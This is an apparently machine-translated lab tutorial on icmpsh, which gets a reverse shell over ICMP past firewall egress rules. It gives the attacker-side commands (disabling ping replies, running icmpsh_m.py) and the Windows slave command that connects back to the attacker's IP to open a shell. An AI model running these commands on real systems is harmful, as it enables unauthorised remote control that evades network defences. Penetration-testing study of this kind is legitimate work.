Foreword
A very old technique, learn.
Brief introduction of ICMP protocol working mode
Internet Control Message Protocol (ICMP) is one of the Internet protocol families. It is used in network equipment, including routers, to send error messages and operation information, indicating that the requested service is unavailable or the host / route is unreachable. The ping command uses the third layer, the network layer protocol, to send a message through the ICMP payload. The packet will be encapsulated with an IP header. Due to MTU limitations, the size of ICMP packets cannot be greater than 1500 bytes.
ICMP packets in the network layer
The Ping command sends an IMCP echo request to the target host. If the target host replies with an echo response, the host is alive
Scene introduction
Sometimes, network administrators use a variety of firewalls, which is very difficult for penetration testing. There is a firewall like this: one that allows known machine traffic on ports and services (ingress filtering) and has powerful egress access control List settings.
When you already own a machine internal network or part of DMZ. He did not obtain the reverse shell through TCP, so he did not consider binding the shell.
However, regarding UDP, it is usually a DNS tunnel or ICMP channel to obtain a reverse shell. The ICMP is the focus of this tool. icmpsh is a simple reverse ICMP shell,
It uses C ( icmpsh-mc ), Perl ( icmpsh-m.pl ), Python ( icmpsh_m.py ) to make win32.slave compatible with the original POSIX.
Its main advantage over other similar open source tools is that it does not require administrator rights to run on the target machine. The tool is simple, convenient and portable (cross-platform).
This script is mainly for windows, he is a C / S architecture: slave (client) it is written in C and can only run on windows,
The master (server) is cross-platform, and the author has ported C and Perl to Python.
For detailed usage, please refer to:
https://github.com/inquisb/icmpsh#usage
Local experiment
hacked:192.168.41.128
hacker:192.168.41.136
First, on the victim's machine, I set up an outbound rule with the firewall, the protocol type is TCP, and the port is 6060
We use python2.7 on kali to start a server running on port 6060
Starting from port 80 is the apache server
Local access
Then use the target machine to access the designated port to test whether the outbound rules are normal
Do not specify the default, access port 80
Here is just to verify that if the server is set to export access control list, you can complete a reverse icmp shell through icmp protocol.
time:
Use the first command to turn off the ping reply, this can prevent the kernel from responding to the ping packet itself, and only use the attacker
sysctl -w net.ipv4.icmp_echo_ignore_all = 1 > / dev / null python icmpsh_m.py 192.168 . 41.136 192.168 . 41.128 #python icmpsh_m.py attacker ip victim ip
Here is an error, read the py file
Then kali is speechless without pip. Reference https://www.cnblogs.com/foe0/p/12217108.html
The thief is slow, then install a package and the thief is slow, and then the new version of kali is not installed vxxxy and go to configure, this series.
windows:
icmpsh.exe -t 192.168.41.136 -d 500 -b 30 -s 128
Execute whoami